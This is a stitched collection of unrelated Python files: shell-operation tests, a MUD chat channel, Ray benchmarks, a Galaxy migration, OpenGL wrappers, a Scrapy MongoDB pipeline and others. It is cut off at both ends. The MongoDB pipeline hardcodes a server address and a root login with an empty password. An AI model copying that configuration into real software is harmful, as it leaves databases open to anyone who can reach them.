self.assertEqual(cp.stderr, "TimeoutError") # # @responses.activate # def test_execute_request(self): # url = 'http://new.url/' # content = "response" # responses.add(method='GET', url=url, body=content, status=200) # # ro = RequestOperation('{"method":"get", "url":"{{view_or_url}}"}', # expected_rc=200) # # params = {"view_or_url": url} # cp = ro.execute(context=params, timeout=None) # # self.assertTrue(cp.success) # self.assertEqual(content, cp.stdout) code = """ import signal import time print("START") signal.signal(signal.SIGTERM, lambda x, y: print("SIGTERM called")) signal.signal(signal.SIGINT, lambda x, y: print("SIGINT called")) time.sleep(100) print("END") """ class TestShellOperation(TestCase): @unittest.skipIf(sys.platform.startswith('win'), "no support on Windows") def test_execute(self): mock_context = mock.Mock() mock_context.env = {} so = dimensigon.use_cases.operations.ShellOperation('echo -n "{{input.message}}"', expected_stdout=None, expected_rc=None, system_kwargs={}) cp = so._execute(dict(input={'message': 'this is a test message'}), context=mock_context) self.assertTrue(cp.success) self.assertEqual('this is a test message', cp.stdout) self.assertIsNone(cp.stderr) self.assertEqual(0, cp.rc) so = 
dimensigon.use_cases.operations.ShellOperation('sleep 10', expected_stdout=None, expected_rc=None, system_kwargs={}) cp = so._execute(dict(input={}), context=mock_context, timeout=0.01) self.assertFalse(cp.success) self.assertIsNone(cp.stdout) self.assertEqual('Timeout of 0.01 seconds while executing shell', cp.stderr) self.assertIsNone(cp.rc) """ Channel The channel class represents the out-of-character chat-room usable by Players in-game. It is mostly overloaded to change its appearance, but channels can be used to implement many different forms of message distribution systems. Note that sending data to channels are handled via the CMD_CHANNEL syscommand (see evennia.syscmds). The sending should normally not need to be modified. """ from evennia.comms.models import TempMsg from evennia.comms.comms import DefaultChannel from evennia.utils.utils import make_iter from muddery.server.utils.localized_strings_handler import _ from muddery.server.utils.defines import ConversationType class MudderyChannel(DefaultChannel): """ Working methods: at_channel_creation() - called once, when the channel is created has_connection(player) - check if the given player listens to this channel connect(player) - connect player to this channel disconnect(player) - disconnect player from channel access(access_obj, access_type='listen', default=False) - check the access on this channel (default access_type is listen) delete() - delete this channel message_transform(msg, emit=False, prefix=True, sender_strings=None, external=False) - called by the comm system and triggers the hooks below msg(msgobj, header=None, senders=None, sender_strings=None, persistent=None, online=False, emit=False, external=False) - main send method, builds and sends a new message to channel. tempmsg(msg, header=None, senders=None) - wrapper for sending non-persistent messages. distribute_message(msg, online=False) - send a message to all connected players on channel, optionally sending only to players that are currently online (optimized for very large sends) Useful hooks: channel_prefix(msg, emit=False) - how the channel should be prefixed when returning to user. Returns a string format_senders(senders) - should return how to display multiple senders to a channel pose_transform(msg, sender_string) - should detect if the sender is posing, and if so, modify the string format_external(msg, senders, emit=False) - format messages sent from outside the game, like from IRC format_message(msg, emit=False) - format the message body before displaying it to the user. 'emit' generally means that the message should not be displayed with the sender's name. pre_join_channel(joiner) - if returning False, abort join post_join_channel(joiner) - called right after successful join pre_leave_channel(leaver) - if returning False, abort leave post_leave_channel(leaver) - called right after successful leave pre_send_message(msg) - runs just before a message is sent to channel post_send_message(msg) - called just after message was sent to channel """ def channel_prefix(self, msg=None, emit=False, **kwargs): """ Hook method. How the channel should prefix itself for users. Args: msg (str, optional): Prefix text emit (bool, optional): Switches to emit mode, which usually means to not prefix the channel's info. Returns: prefix (str): The created channel prefix. """ return '' if emit else '[%s] ' % _(self.key, category="channels") def get_message(self, caller, message): """ Receive a message from a character. :param caller: talker. :param message: content. 
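The message is wrapped into a CHANNEL-type conversation dict (channel name,
sender id and name, message text) and broadcast to all listeners via msg()
with emit=True.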
""" if not self.access(caller, "send"): caller.msg(_("You can not talk in this channel.")) return output = { "conversation": { "type": ConversationType.CHANNEL.value, "channel": _(self.key, category="channels"), "from_id": caller.get_id(), "from_name": caller.get_name(), "msg": message, } } msgobj = TempMsg(message=output, channels=[self]) self.msg(msgobj, emit=True) def msg( self, msgobj, header=None, senders=None, sender_strings=None, keep_log=None, online=False, emit=False, external=False, ): """ Send the given message to all accounts connected to channel. Note that no permission-checking is done here; it is assumed to have been done before calling this method. The optional keywords are not used if persistent is False. Args: msgobj (Msg, TempMsg or str): If a Msg/TempMsg, the remaining keywords will be ignored (since the Msg/TempMsg object already has all the data). If a string, this will either be sent as-is (if persistent=False) or it will be used together with `header` and `senders` keywords to create a Msg instance on the fly. header (str, optional): A header for building the message. senders (Object, Account or list, optional): Optional if persistent=False, used to build senders for the message. sender_strings (list, optional): Name strings of senders. Used for external connections where the sender is not an account or object. When this is defined, external will be assumed. keep_log (bool or None, optional): This allows to temporarily change the logging status of this channel message. If `None`, the Channel's `keep_log` Attribute will be used. If `True` or `False`, that logging status will be used for this message only (note that for unlogged channels, a `True` value here will create a new log file only for this message). online (bool, optional) - If this is set true, only messages people who are online. Otherwise, messages all accounts connected. This can make things faster, but may not trigger listeners on accounts that are offline. emit (bool, optional) - Signals to the message formatter that this message is not to be directly associated with a name. external (bool, optional): Treat this message as being agnostic of its sender. Returns: success (bool): Returns `True` if message sending was successful, `False` otherwise. 
""" senders = make_iter(senders) if senders else [] if isinstance(msgobj, str): # given msgobj is a string - convert to msgobject (always TempMsg) msgobj = TempMsg(senders=senders, header=header, message=msgobj, channels=[self]) # we store the logging setting for use in distribute_message() msgobj.keep_log = keep_log if keep_log is not None else self.db.keep_log # start the sending msgobj = self.pre_send_message(msgobj) if not msgobj: return False msgobj = self.message_transform( msgobj, emit=emit, prefix=False, sender_strings=sender_strings, external=external ) self.distribute_message(msgobj, online=online) self.post_send_message(msgobj) return True from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import pytest import ray from ray.tests.conftest import _ray_start_cluster num_tasks_submitted = [10**n for n in range(0, 6)] num_tasks_ids = ["{}_tasks".format(i) for i in num_tasks_submitted] @ray.remote def dummy_task(val): return val def benchmark_task_submission(num_tasks): total_tasks = 100000 for _ in range(total_tasks // num_tasks): ray.get([dummy_task.remote(i) for i in range(num_tasks)]) def warmup(): x = np.zeros(10**6, dtype=np.uint8) for _ in range(5): for _ in range(5): ray.put(x) for _ in range(5): ray.get([dummy_task.remote(0) for _ in range(1000)]) @pytest.mark.benchmark @pytest.mark.parametrize("num_tasks", num_tasks_submitted, ids=num_tasks_ids) def test_task_submission(benchmark, num_tasks): num_cpus = 16 ray.init( num_cpus=num_cpus, object_store_memory=10**7, ignore_reinit_error=True) # warm up the plasma store warmup() benchmark(benchmark_task_submission, num_tasks) ray.shutdown() def benchmark_task_forward(f, num_tasks): ray.get([f.remote() for _ in range(num_tasks)]) @pytest.mark.benchmark @pytest.mark.parametrize( "num_tasks", [10**3, 10**4], ids=[str(num) + "_tasks" for num in [10**3, 10**4]]) def test_task_forward(benchmark, num_tasks): with _ray_start_cluster(num_cpus=16, object_store_memory=10**6) as cluster: cluster.add_node(resources={"my_resource": 100}) ray.init(redis_address=cluster.redis_address) @ray.remote(resources={"my_resource": 0.001}) def f(): return 1 # Warm up ray.get([f.remote() for _ in range(100)]) benchmark(benchmark_task_forward, f, num_tasks) backend/akastories/admin.py from django.contrib import admin from .models import StoryUser # Register your models here. class StoryUserAdmin(admin.ModelAdmin): list_display = ('nim', 'username', 'updated_at') admin.site.register(StoryUser, StoryUserAdmin) igorhollaender/sirv_dashboard """ Migration script to add the cleanup_event* tables. 
""" import datetime import logging import sys from sqlalchemy import Column, DateTime, ForeignKey, Integer, MetaData, Table from galaxy.model.custom_types import TrimmedString now = datetime.datetime.utcnow log = logging.getLogger( __name__ ) log.setLevel( logging.DEBUG ) handler = logging.StreamHandler( sys.stdout ) format = "%(name)s %(levelname)s %(asctime)s %(message)s" formatter = logging.Formatter( format ) handler.setFormatter( formatter ) log.addHandler( handler ) metadata = MetaData() # New table to log cleanup events CleanupEvent_table = Table( "cleanup_event", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "message", TrimmedString( 1024 ) ) ) CleanupEventDatasetAssociation_table = Table( "cleanup_event_dataset_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "dataset_id", Integer, ForeignKey( "dataset.id" ), index=True ) ) CleanupEventMetadataFileAssociation_table = Table( "cleanup_event_metadata_file_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "metadata_file_id", Integer, ForeignKey( "metadata_file.id" ), index=True ) ) CleanupEventHistoryAssociation_table = Table( "cleanup_event_history_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "history_id", Integer, ForeignKey( "history.id" ), index=True ) ) CleanupEventHistoryDatasetAssociationAssociation_table = Table( "cleanup_event_hda_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "hda_id", Integer, ForeignKey( "history_dataset_association.id" ), index=True ) ) CleanupEventLibraryAssociation_table = Table( "cleanup_event_library_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "library_id", Integer, ForeignKey( "library.id" ), index=True ) ) CleanupEventLibraryFolderAssociation_table = Table( "cleanup_event_library_folder_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "library_folder_id", Integer, ForeignKey( "library_folder.id" ), index=True ) ) CleanupEventLibraryDatasetAssociation_table = Table( "cleanup_event_library_dataset_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "library_dataset_id", Integer, ForeignKey( "library_dataset.id" ), index=True ) ) CleanupEventLibraryDatasetDatasetAssociationAssociation_table = Table( "cleanup_event_ldda_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( 
"cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "ldda_id", Integer, ForeignKey( "library_dataset_dataset_association.id" ), index=True ) ) CleanupEventImplicitlyConvertedDatasetAssociationAssociation_table = Table( "cleanup_event_icda_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "icda_id", Integer, ForeignKey( "implicitly_converted_dataset_association.id" ), index=True ) ) def upgrade(migrate_engine): metadata.bind = migrate_engine print __doc__ metadata.reflect() try: CleanupEvent_table.create() CleanupEventDatasetAssociation_table.create() CleanupEventMetadataFileAssociation_table.create() CleanupEventHistoryAssociation_table.create() CleanupEventHistoryDatasetAssociationAssociation_table.create() CleanupEventLibraryAssociation_table.create() CleanupEventLibraryFolderAssociation_table.create() CleanupEventLibraryDatasetAssociation_table.create() CleanupEventLibraryDatasetDatasetAssociationAssociation_table.create() CleanupEventImplicitlyConvertedDatasetAssociationAssociation_table.create() except Exception, e: log.debug( "Creating table failed: %s" % str( e ) ) def downgrade(migrate_engine): metadata.bind = migrate_engine metadata.reflect() try: CleanupEventImplicitlyConvertedDatasetAssociationAssociation_table.drop() CleanupEventLibraryDatasetDatasetAssociationAssociation_table.drop() CleanupEventLibraryDatasetAssociation_table.drop() CleanupEventLibraryFolderAssociation_table.drop() CleanupEventLibraryAssociation_table.drop() CleanupEventHistoryDatasetAssociationAssociation_table.drop() CleanupEventHistoryAssociation_table.drop() CleanupEventMetadataFileAssociation_table.drop() CleanupEventDatasetAssociation_table.drop() CleanupEvent_table.drop() except Exception, e: log.debug( "Dropping table failed: %s" % str( e ) ) appasahebs/bzTakeHome from django.views import generic from django.http import HttpResponse from backfill.models import Backfill class BackfillView(generic.ListView): def get(self, request, *args, **kwargs): Backfill.populate() return HttpResponse('Backfill of data done for articles!') '''OpenGL extension ATI.vertex_streams This module customises the behaviour of the OpenGL.raw.GL.ATI.vertex_streams to provide a more Python-friendly API Overview (from the spec) This extension adds the ability to handle sets of auxilliary vertex and normal coordinates. These sets of auxilliary coordinates are termed streams, and can be routed selectively into the blend stages provided by the vertex blending extension. This functionality enables software animation techniques such as keyframe vertex morphing. 
The official definition of this extension is available here: http://www.opengl.org/registry/specs/ATI/vertex_streams.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.ATI.vertex_streams import * from OpenGL.raw.GL.ATI.vertex_streams import _EXTENSION_NAME def glInitVertexStreamsATI(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) glVertexStream1svATI=wrapper.wrapper(glVertexStream1svATI).setInputArraySize( 'coords', 1 ) glVertexStream1ivATI=wrapper.wrapper(glVertexStream1ivATI).setInputArraySize( 'coords', 1 ) glVertexStream1fvATI=wrapper.wrapper(glVertexStream1fvATI).setInputArraySize( 'coords', 1 ) glVertexStream1dvATI=wrapper.wrapper(glVertexStream1dvATI).setInputArraySize( 'coords', 1 ) glVertexStream2svATI=wrapper.wrapper(glVertexStream2svATI).setInputArraySize( 'coords', 2 ) glVertexStream2ivATI=wrapper.wrapper(glVertexStream2ivATI).setInputArraySize( 'coords', 2 ) glVertexStream2fvATI=wrapper.wrapper(glVertexStream2fvATI).setInputArraySize( 'coords', 2 ) glVertexStream2dvATI=wrapper.wrapper(glVertexStream2dvATI).setInputArraySize( 'coords', 2 ) glVertexStream3svATI=wrapper.wrapper(glVertexStream3svATI).setInputArraySize( 'coords', 3 ) glVertexStream3ivATI=wrapper.wrapper(glVertexStream3ivATI).setInputArraySize( 'coords', 3 ) glVertexStream3fvATI=wrapper.wrapper(glVertexStream3fvATI).setInputArraySize( 'coords', 3 ) glVertexStream3dvATI=wrapper.wrapper(glVertexStream3dvATI).setInputArraySize( 'coords', 3 ) glVertexStream4svATI=wrapper.wrapper(glVertexStream4svATI).setInputArraySize( 'coords', 4 ) glVertexStream4ivATI=wrapper.wrapper(glVertexStream4ivATI).setInputArraySize( 'coords', 4 ) glVertexStream4fvATI=wrapper.wrapper(glVertexStream4fvATI).setInputArraySize( 'coords', 4 ) glVertexStream4dvATI=wrapper.wrapper(glVertexStream4dvATI).setInputArraySize( 'coords', 4 ) glNormalStream3bvATI=wrapper.wrapper(glNormalStream3bvATI).setInputArraySize( 'coords', 3 ) glNormalStream3svATI=wrapper.wrapper(glNormalStream3svATI).setInputArraySize( 'coords', 3 ) glNormalStream3ivATI=wrapper.wrapper(glNormalStream3ivATI).setInputArraySize( 'coords', 3 ) glNormalStream3fvATI=wrapper.wrapper(glNormalStream3fvATI).setInputArraySize( 'coords', 3 ) glNormalStream3dvATI=wrapper.wrapper(glNormalStream3dvATI).setInputArraySize( 'coords', 3 ) ### END AUTOGENERATED SECTIONnandana/kbqa-relation-linking import json import torch from collections import Counter from opennre.encoder.bert_encoder import BERTEntityEncoder from opennre.model.ranking_nn import RankingNN from relation_linking_core.rel_linker_modules.rel_linker_module import RelModule class NeuralRelationLinking(RelModule): question_terms = ['what', 'when', 'which', 'who', 'how', 'list', 'give', 'show', 'do', 'does'] def __init__(self, config): rel_id_path = "/Users//Src/relation-linking/data/lcquad/rel2id.json" rel2id = json.load(open(rel_id_path)) pretrain_path = "/Users//Src/relation-linking/data/bert-base-uncased" ckpt_path = "/Users//Src/relation-linking/data/lcquad/nre4qald_v4_10_bertentity_softmax.pth.tar" sentence_encoder = BERTEntityEncoder(max_length=80, pretrain_path=pretrain_path) print("Loading neural model ...\n\trel2id path: {}\n\trels: {}\n\tpretrain_path: {}\n\tckpt: {}". 
format(rel_id_path, len(rel2id), pretrain_path, ckpt_path)) self.neural_model = RankingNN(sentence_encoder, len(rel2id), rel2id) if torch.cuda.is_available(): self.neural_model.load_state_dict(torch.load(ckpt_path, map_location='cuda')['state_dict']) self.neural_model.cuda() else: self.neural_model.load_state_dict(torch.load(ckpt_path, map_location='cpu')['state_dict']) with torch.no_grad(): self.neural_model.r_hiddens = self.neural_model.forward_all_relations() def get_relation_candidates(self, triple_data, params=None): relation_scores = Counter() normalized_to_surface_form = params['normalized_to_surface_form'] subj_text, subj_type = triple_data['subj_text'], triple_data['subj_type'] obj_text, obj_type = triple_data['obj_text'], triple_data['obj_type'] head = subj_text if subj_text else subj_type tail = obj_text if obj_text else obj_type if triple_data['amr_unknown_var'] == triple_data['subj_id'] or head == 'amr-unknown' or head == 'unknown': amr_unkown = head elif triple_data['amr_unknown_var'] == triple_data['obj_id'] or tail == 'amr-unknown' or tail == 'unknown': amr_unkown = tail else: amr_unkown = None print("OpenNRE:\n\thead: {}\n\ttail: {}\n\tamr-unknown: {}".format(head, tail, amr_unkown)) input = NeuralRelationLinking.prepare_opennre_input(triple_data['text'], head, tail, normalized_to_surface_form, amr_unkown) if input: openre_response = self.neural_model.infer_ranking(input) opennre_relations = [(rel[0], rel[1]) for rel in openre_response[:10]] for rel in opennre_relations: relation_scores[rel[0]] += rel[1] print("\topennre relations: {}".format(opennre_relations)) else: print("\topennre input error:\n\tsent: {}\n\th: {} \t: {}".format(triple_data['text'], head, tail)) return relation_scores @classmethod def prepare_opennre_input(cls, sentence, head, tail, normalized_to_surface_form, amr_unkown): sentence = sentence.lower() head_start, tail_start = sentence.find(head.lower()), sentence.find(tail.lower()) if head_start == -1: if head in normalized_to_surface_form: head_start = sentence.find(normalized_to_surface_form[head].lower()) if head_start == -1 and amr_unkown == head: for term in NeuralRelationLinking.question_terms: head_start = sentence.find(term) if head_start != -1: head = term break if tail_start == -1: if tail in normalized_to_surface_form: tail_start = sentence.find(normalized_to_surface_form[tail].lower()) if tail_start == -1 and amr_unkown == tail: for term in NeuralRelationLinking.question_terms: tail_start = sentence.find(term) if tail_start != -1: tail = term break if head_start == -1 or tail_start == -1: return else: head_end, tail_end = head_start + len(head) + 1, tail_start + len(tail) + 1 return {"text": sentence, "h": {"pos": (head_start, head_end)}, "t": {"pos": (tail_start, tail_end)}} from ippa import Process class RelatedIllness(Process): def find_new_state(self, events, ti): if 'RelatedDz' in events: return events['RelatedDz'][0].Type else: return False search_service/search/pagination.py import logging from django.conf import settings from rest_framework.pagination import PageNumberPagination from rest_framework.response import Response logger = logging.getLogger(__name__) class MadocPagination(PageNumberPagination): """ Pagination class for Madoc results "pagination": { "page": 1, "totalPages": 35, "totalResults": 830 } """ page_size_query_param = "page_size" max_page_size = settings.MAX_PAGE_SIZE def get_paginated_response(self, data): return Response( { "pagination": { "page": self.page.number, "pageSize": self.page.paginator.per_page, "next": 
self.get_next_link(), "previous": self.get_previous_link(), "totalPages": self.page.paginator.num_pages, "totalResults": self.page.paginator.count, }, "results": data, } ) tools/ks-package-list.py #!/usr/bin/python3 import sys import argparse import pykickstart import pykickstart.parser import pykickstart.version import dnf import dnf.transaction PKG_FORMAT = "{name}-{version}-{release}.{arch}" # Command line parsing argparser = argparse.ArgumentParser(description='List kickstart package dependencies.') argparser.add_argument('kickstart_file', metavar='KICKSTART', help='The kickstart file to parse') argparser.add_argument('--releasever', metavar='RELEASEVER', help='release version', type=int, required=False) argparser.add_argument('--format', metavar='FORMAT', help='package format (default is '+ PKG_FORMAT +')', required=False) argparser.add_argument('--verbose', help='print additional info to stderr', action='store_true') args = argparser.parse_args() # Kickstart parsing ksparser = pykickstart.parser.KickstartParser(pykickstart.version.makeVersion()) ksparser.readKickstart(args.kickstart_file) # Base object for dnf operations: https://dnf.readthedocs.io/en/latest/api.html dnf_base = dnf.Base() # Set release version if any if args.releasever: if args.verbose: print(f'# Setting release version to {args.releasever}', file=sys.stderr) dnf_base.conf.releasever = args.releasever if args.verbose: print(f'# Exclude weak dependencies: {ksparser.handler.packages.excludeWeakdeps}', file=sys.stderr) dnf_base.conf.install_weak_deps = not ksparser.handler.packages.excludeWeakdeps # Create parser for kickstart 'repo' command repoparser = argparse.ArgumentParser(prog='repo', description='Kickstart repo command') repoparser.add_argument('--name', required=True) repourl_opt = repoparser.add_mutually_exclusive_group() repourl_opt.add_argument('--baseurl', required=False) repourl_opt.add_argument('--metalink', required=False) repourl_opt.add_argument('--mirrorlist', required=False) # Parse repo list from kickstart file repolist = ksparser.handler.commands['repo'].dataList() if repolist: if args.verbose: print(f'# Processing {len(repolist)} repositories', file=sys.stderr) for repocmd in ksparser.handler.commands['repo'].dataList(): if args.verbose: print(f"# {repocmd}".strip(), file=sys.stderr) repoargs = repoparser.parse_args(args=f"{repocmd}".split()[1:]) repourls = {} if repoargs.baseurl: repourls['baseurl'] = repoargs.baseurl if repoargs.metalink: repourls['metalink'] = repoargs.metalink if repoargs.mirrorlist: repourls['mirrorlist'] = repoargs.mirrorlist # Add repo to current configuration dnf_base.repos.add_new_repo(repoid=repoargs.name.strip('"'), conf=dnf_base.conf, **repourls) elif args.verbose: print('# No repository command in kickstart file', file=sys.stderr) # Dump config # print(f"# Config: {dnf_base.conf.dump()}", file=sys.stderr) # Retrieve metadata information about all known packages dnf_base.fill_sack(load_system_repo=False) # Retrieve metadata information about all known groups dnf_base.read_comps() # Resolves package list from name def resolvePackage(pkg_name): return dnf_base.sack.query().filter(name__glob=pkg_name, latest_per_arch=True) # Process kickstart required groups for group in ksparser.handler.packages.groupList: resolved_group = dnf_base.comps.group_by_pattern(group.name) if resolved_group: # Add group to install transaction found = dnf_base.group_install(resolved_group.id, dnf_base.conf.group_package_types) if args.verbose: print(f"# Including {found} packages from group 
{group}", file=sys.stderr) else: print(f"# Warning: cannot find required group {group.name}", file=sys.stderr) # Process kickstart excluded packages excluded_list = ksparser.handler.packages.excludedList if args.verbose: print(f"# Processing {len(excluded_list)} explicitly excluded packages: {excluded_list}", file=sys.stderr) for pkg in excluded_list: resolved = resolvePackage(pkg) if not resolved and args.verbose: print(f"# Warning: cannot find excluded package {pkg}", file=sys.stderr) # Process kickstart required packages included_list = ksparser.handler.packages.packageList for pkg in included_list: resolved = resolvePackage(pkg) if not resolved: print(f"# Warning: cannot find required package {pkg}", file=sys.stderr) # Resolve install dependencies dnf_base.install_specs(included_list, exclude=excluded_list) dnf_base.resolve() # Print formatted results pkg_format = PKG_FORMAT if args.format: pkg_format = args.format for pkg in sorted(dnf_base.transaction.install_set): print(pkg_format.format(name=pkg.name,epoch=pkg.epoch,version=pkg.version,release=pkg.release,arch=pkg.arch)) 1-10 # -*- coding: utf-8 -*- from pymongo import MongoClient from scrapy import logformatter import traceback from scrapy.exceptions import DropItem class MongodbPipeline(object): MONGODB_SERVER = '172.16.17.32' MONGODB_PORT = 27017 MONGODB_DB = 'JayMongo' MONGODB_USER = 'root' MONGODB_PWD = '' def __init__(self): try: self.client = MongoClient(host=self.MONGODB_SERVER, port=self.MONGODB_PORT) self.db = self.client[self.MONGODB_DB] self.db.authenticate(name=self.MONGODB_USER, password=self.MONGODB_PWD) self.col = self.db["movie_content"] except Exception: traceback.print_exc() @classmethod def from_crawler(cls, crawler): cls.MONGODB_SERVER = crawler.settings.get('SingleMONGODB_SERVER', '172.16.17.32') cls.MONGODB_PORT = crawler.settings.getint('SingleMONGODB_PORT', 27017) cls.MONGODB_DB = crawler.settings.get('SingleMONGODB_DB', 'JayMongo') cls.MONGODB_USER = crawler.settings.get('SingleMONGODB_USER', 'root') cls.MONGODB_PWD = crawler.settings.get('SingleMONGODB_PWD', '') pipe = cls() pipe.crawler = crawler return pipe def process_item(self, item, spider): # if item['a'] == 0: # raise DropItem("Duplicate item found: %s" % item) movie_detail = { 'url': item.get('url'), 'title': item.get('title'), 'director': item.get('director'), 'screenwriter': item.get('screenwriter'), 'actors': item.get('actors'), 'category': item.get('category'), 'country': item.get('country'), 'langrage': item.get('langrage'), 'initial': item.get('initial'), 'runtime': item.get('runtime'), 'playUrl': item.get('playUrl'), 'rate': item.get('rate'), 'starPeople': item.get('starPeople'), 'preShowUrl': item.get('preShowUrl'), 'intro': item.get('intro'), 'icon': item.get('icon') } result = self.col.insert(movie_detail) print('[success] insert ' + item['url'] + ' title:' + item['title']) return item jbytecode/pygenprogtest/testfindrule.py import unittest from gp import * from interpreter import * class TestFindRule(unittest.TestCase): funclist = [LessThanFunction("<", 4), BiggerThanFunction(">", 4)] constantlist = [] varlist = {"x1": 0, "x2": 0} def fitness (self, code): # The rule is # if x1 > x2 then return x1 # else if x2 > x1 then return x2 x1 = [1, 4, 5, 8] x2 = [2, 3, 6, 7] y = [2, 4, 6, 8] total = 0.0 for i in range(len(x1)): resulti = postfixeval( code, self.funclist, {"x1": x1[i], "x2": x2[i]})[0] total = total + math.pow(y[i] - resulti, 2.0) return -total def testFindRule(self): gp = GP(self.fitness, self.funclist, self.varlist, 
self.constantlist, popsize = 100, deep = 1, maxdeep = 1) gp.createRandomPopulation() gp.iterateN(100) gp.sortPopulation() self.assertTrue(gp.chromosomes[0].code in [ ['x1', 'x2', 'x1', 'x2', '>'], ['x2', 'x1', 'x2', 'x1', '>'], ['x2', 'x1', 'x1', 'x2', '<'], ['x1', 'x2', 'x2', 'x1', '<'] ])1-10 import json from arq.jobs import Job from fastapi import APIRouter from starlette.requests import Request router = APIRouter() async def test(request: Request): job = await request.app.state.arq_redis.enqueue_job('say_hello', name="wt", _queue_name="arq:queue1") job_ = await job.info() return {"job_": job_} async def get_queue_health_check(request: Request, queue_name="arq:queue3"): workers = await request.app.state.arq_redis.all_workers() queues_ = set([json.loads(v).get("queue_name") for k, v in workers.items()]) # print(workers) # print(queues_) __ = [] for queue_name in queues_: r = await request.app.state.arq_redis._get_health_check(queue_name=f"{queue_name}:health-check") r_ = json.loads(r) workers_ = [json.loads(v).get("worker_consumer_name") for k, v in workers.items() if json.loads(v).get("queue_name") == queue_name] r_.update({"queue_name": queue_name, "workers": workers_}) __.append(r_) return {"code": 20000, "result": __,"total":len(__)} async def queued_jobs(request: Request, queue_name="arq:queue3"): queued_jobs_ = await request.app.state.arq_redis.queued_jobs(queue_name=queue_name) queued_jobs__ = [] for queued_job_ in queued_jobs_: state = await Job(job_id=queued_job_.__dict__.get("job_id"), redis=request.app.state.arq_redis, _queue_name=queue_name).status() queued_job_.__dict__.update({"state": state}) queued_jobs__.append(queued_job_) results = await request.app.state.arq_redis.all_job_results() results_ = [] for result in results: if result.__dict__.get("queue_name") == queue_name: result.__dict__.update({"state": "complete"}) results_.append(result) __ = results_ + queued_jobs__ # queued_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "queued"]) # in_progress_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "in_progress"]) # deferred_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "deferred"]) # complete_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "complete"]) # print(queued_num, in_progress_num, deferred_num, complete_num) return { "code": 20000, "queued_jobs__": __ } router.add_api_route(methods=['GET'], path="/test", endpoint=test, summary="test") router.add_api_route(methods=['GET'], path="/get_queue_health_check", endpoint=get_queue_health_check, summary="get_queue_health_check") router.add_api_route(methods=['GET'], path="/queued_jobs", endpoint=queued_jobs, summary="queued_jobs") scripts/errors.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon May 6 22:17:15 2019 @authors: , , File Description: The errors file is used to calculate the various types of errors that are used in this dataset. Localization Error is the Euclidean distance between each latitude and longitude measurement for the prediction and truth. The Number of Misclassified is the number of misclassified samples. Standard Error is the error defined by the creators of the dataset for the IPIN2015 competition. In this competition building misclassifications were penalized by 50 meters each and floor misclassifications were penalized by 4 meters each. The Standard Error is given by the penalties multiplied by the number of misclassifications plus the Localization Error. 
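For example (illustrative numbers only): a prediction set with 2 building misclassifications, 3 floor misclassifications, and a summed Localization Error of 120 meters would have a Standard Error of 50*2 + 4*3 + 120 = 232 meters.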
Finally there is a coordinate probability error that calculates the probability of being under 10 meters. The main function here is compute_errors while everything else is a helper function. """ #Libraries from numpy import sqrt, square, sum # Hyper-parameters / CONSTANTS BP = 50 # Default Building Penalty FP = 4 # Default Floor Penalty COORDS_PROB = 10 # meters def localization_error(prediction, truth): ''' Computes the Localization Error by computing the Euclidean distance between the predicted latitude and longitude and the true latitude and longitude. Parameters: prediction : (Dataframe) truth : (Dataframe) Returns: error : (array) error between each sample ''' x, y = prediction['LONGITUDE'].values, prediction['LATITUDE'].values x0, y0 = truth['LONGITUDE'].values, truth['LATITUDE'].values error = sqrt(square(x - x0) + square(y - y0)) return error def number_misclassified(prediction, truth, column_name): ''' Computes the number of misclassifications by summing how many elements do not match between the prediction and truth columns. The column_name parameter is there because this can be used for the Floor or the Building. Parameters: prediction : (Dataframe) truth : (Dataframe) column_name : (str) specifies which column to compute the error Returns: error : (int) total number of misclassifications. ''' error = sum(prediction[column_name].values != truth[column_name].values) return error def compute_errors(prediction, truth, building_penalty=BP, floor_penalty=FP): ''' Computes the misclassification errors, localization error, standard error, and coordinate error probability for being under 10 meters. For more detail, see the File Description. Parameters: prediction : (Dataframe) truth : (Dataframe) building_penalty : (int) floor_penalty : (int) Returns: errors : (tuple) contains all error types ''' build_misclass = number_misclassified(prediction, truth, "BUILDINGID") floor_misclass = number_misclassified(prediction, truth, "FLOOR") coords_error = localization_error(prediction, truth) standard_error = (building_penalty * build_misclass + floor_penalty * floor_misclass + sum(coords_error)) coords_error_prob = (coords_error[coords_error < COORDS_PROB].shape[0] / coords_error.shape[0] * 100) errors = (build_misclass, floor_misclass, coords_error, standard_error, coords_error_prob) return errorsnum1 = int(input('Enter a number: ')) num2 = int(input('Enter another number: ')) if num1 > num2: print('The number {} is greater than 